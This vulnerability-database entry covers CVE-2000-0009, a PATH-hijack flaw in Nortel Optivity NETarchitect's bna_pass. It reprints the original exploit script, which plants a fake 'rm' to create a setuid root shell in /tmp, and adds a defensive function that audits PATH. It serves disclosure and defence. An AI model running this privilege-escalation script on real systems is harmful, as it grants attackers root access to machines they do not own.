Optivity NETarchitect: the bna_pass program uses the PATH environment variable to find the "rm" program

Vulnerability ID: 1105666, Vulnerability type: Other
Published: 1999-12-30, Updated: 2005-10-12
CVE ID: CVE-2000-0009
CNNVD-ID: CNNVD-199912-099
Platform: Multiple, CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/19704
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-099
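|Vulnerability details
The bna_pass program in Optivity NETarchitect uses the PATH environment variable to find the "rm" program, which allows local users to execute arbitrary commands.
|Exploit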
source: http://www.securityfocus.com/bid/907/info

NETarchitect is an application for simplifying the task of designing and deploying complex switched network system configurations, produced by Nortel Networks and usually shipped with the Optivity Network Configuration System suite of utilities. It is possible to gain root privileges on an HP-UX (possibly Solaris) system running NETarchitect by exploiting a path vulnerability in the binary /opt/bna/bin/bna_pass. bna_pass executes 'rm' by bare name, assuming that the end user's PATH value is valid and that the rm it resolves to is the real binary. Because of this, it is possible to have bna_pass execute arbitrary binaries as root if the PATH variable is manipulated. A malicious user can add "." to his PATH environment variable and have binaries searched for and executed in "." before any other directories in PATH. A false 'rm' would then be executed, compromising the system.

#!/bin/sh
#
# bna.sh - Loneguard 03/03/99
#
# Poision path xploit for Optivity NETarchitect on HPUX
#
cd /tmp
touch /usr/bna/tmp/.loginChk
PATH=.:$PATH;export PATH
cat > rm << _EOF
#!/bin/sh
cp /bin/csh /tmp/kungfu
chmod 4755 /tmp/kungfu
_EOF
chmod 755 /tmp/rm
/opt/bna/bin/bna_pass
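
A defensive check for the PATH weakness described above, as an added example that is not part of the original advisory or exploit: a POSIX shell function (the name unsafe_path_entries is hypothetical) that flags PATH entries which let a bare command name resolve to a file outside trusted system directories. It inspects each entry itself, not its parent directories.

```sh
#!/bin/sh
# Added example (not from the advisory): audit a PATH value before a
# privileged program relies on it to resolve a bare name such as "rm".

# unsafe_path_entries PATHSTRING
# Prints one finding per unsafe entry. Returns 0 if clean, 1 otherwise.
unsafe_path_entries() {
    rest="$1:"        # trailing ":" keeps a final empty entry visible
    found=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case $entry in
            "")
                echo "empty entry: searched as the current directory"
                found=1 ;;
            /*)
                # -H follows a symlinked entry (e.g. /bin -> usr/bin) so the
                # mode tested is the directory's, not the link's.
                if [ -n "$(find -H "$entry" -prune -type d -perm -0002 2>/dev/null)" ]; then
                    echo "world-writable directory: $entry"
                    found=1
                fi ;;
            *)
                echo "relative entry: $entry"
                found=1 ;;
        esac
    done
    return "$found"
}

# Hardened pattern for the privileged side: fixed PATH, absolute command.
#   PATH=/usr/bin:/bin; export PATH
#   /bin/rm -f -- "$file"      # "$file" is a hypothetical variable

# Run as "sh script.sh --audit" to check the caller's own PATH.
if [ "${1:-}" = "--audit" ]; then
    unsafe_path_entries "$PATH"
fi
```
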
|References

Source: BID
Name: 907
Link: http://www.securityfocus.com/bid/907
